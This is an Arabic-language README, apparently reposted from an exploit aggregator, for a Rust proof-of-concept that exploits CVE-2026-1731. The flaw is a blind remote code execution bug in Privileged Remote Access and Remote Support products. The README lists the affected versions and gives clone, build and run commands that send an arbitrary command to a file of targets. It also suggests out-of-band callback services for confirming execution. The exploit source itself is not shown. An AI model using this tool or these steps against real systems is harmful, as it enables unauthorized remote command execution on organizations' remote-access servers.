## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAKUBIE07-CVE-2026-1731
# CVE-2026-1731 Blind RCE PoC
#### الإصدارات المتأثرة:
* **Privileged Remote Access** : <= 24.3.4
* **Remote Support** : <= 25.3.1
لمزيد من المعلومات، أنصحك بقراءة التحليل من attackerkb.com.
## طريقة البناء
ستحتاج إلى الأدوات التالية لبناء هذا الـ PoC: Git, rust
1. استنسخ المستودع الخاص بي
root@kitploit:~
git clone https://github.com/jakubie07/CVE-2026-1731.git
2. انتقل إلى الدليل وقم بالبناء
root@kitploit:~
cd CVE-2026-1731
cargo build --release
3. انتظر حتى يتم تجميع الكود وسيكون ملفك الثنائي `CVE-2026-1731` موجودًا في `target/release`
#### بيئة Unix (MacOS/Linux)
root@kitploit:~
cd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
#### بيئة Windows:
root@kitploit:~
cd target/release
./CVE-2026-1731.exe -h
## الاستخدام
يمكنك تشغيل `./CVE-2026-1731 -h` لعرض قائمة بالخيارات المتاحة
#### مثال على الاستخدام:
root@kitploit:~
./CVE-2026-1731 --targets targets.txt --command "whoami"
**ملاحظة:** نظرًا لأن `CVE-2026-1731` هو ثغرة RCE عمياء (blind RCE)، فلا يوجد استجابة تُرسل من المضيف يمكن استخدامها كمؤشر على الثغرة. قد يكون الطلب ناجحًا، لكن الهدف غير المعرّض للثغرة لن يُفعّل RCE. يُنصح باستخدام خدمة مثل `webhook.site` أو `PortSwigger's Burp Collaborator` للاختبار ضد الأهداف. يعتمد نجاح أو فشل هذا الـ PoC على ما إذا كان الخادم يستجيب برمز حالة 200 أم لا.
## المهام المتبقية
* إضافة فحص الإصدار قبل الاستغلال عبر نقطة النهاية `GET /get_rdf?comp=sdcust&locale_code=en-us`.
## المراجع
https://github.com/win3zz/CVE-2026-1731
https://nvd.nist.gov/vuln/detail/CVE-2026-1731
#### تحليل ممتاز: https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis